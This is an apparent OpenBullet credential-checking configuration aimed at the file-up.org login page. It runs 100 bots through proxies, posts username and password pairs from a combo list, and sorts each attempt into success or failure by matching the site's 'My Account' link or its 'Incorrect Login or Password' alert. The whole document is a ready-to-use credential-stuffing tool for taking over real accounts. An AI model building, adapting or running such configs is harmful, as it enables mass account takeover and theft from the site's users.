[SETTINGS]
{
  "Name": "file upload",
  "SuggestedBots": 100,
  "LastModified": "2019-05-25T01:17:35.168234+02:00",
  "AdditionalInfo": "",
  "Author": "ahmedalaa",
  "Version": "1.1.1",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.file-up.org/login.html" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#login REQUEST POST "https://www.file-up.org/login.html" 
  CONTENT "op=login&token=<token>&rand=&redirect=https%3A%2F%2Fwww.file-up.org%2F&login=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://www.file-up.org" 
  HEADER "referer: https://www.file-up.org/login.html" 

PARSE "<SOURCE>" LR "name=\"token\" value=\"" "\">" -> VAR "token" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<li><a href=\"https://www.file-up.org/?op=my_account\">My Account</a></li>" 
  KEYCHAIN Failure OR 
    KEY "<div class=\"alert alert-danger\" role=\"alert\">Incorrect Login or Password</div>" 

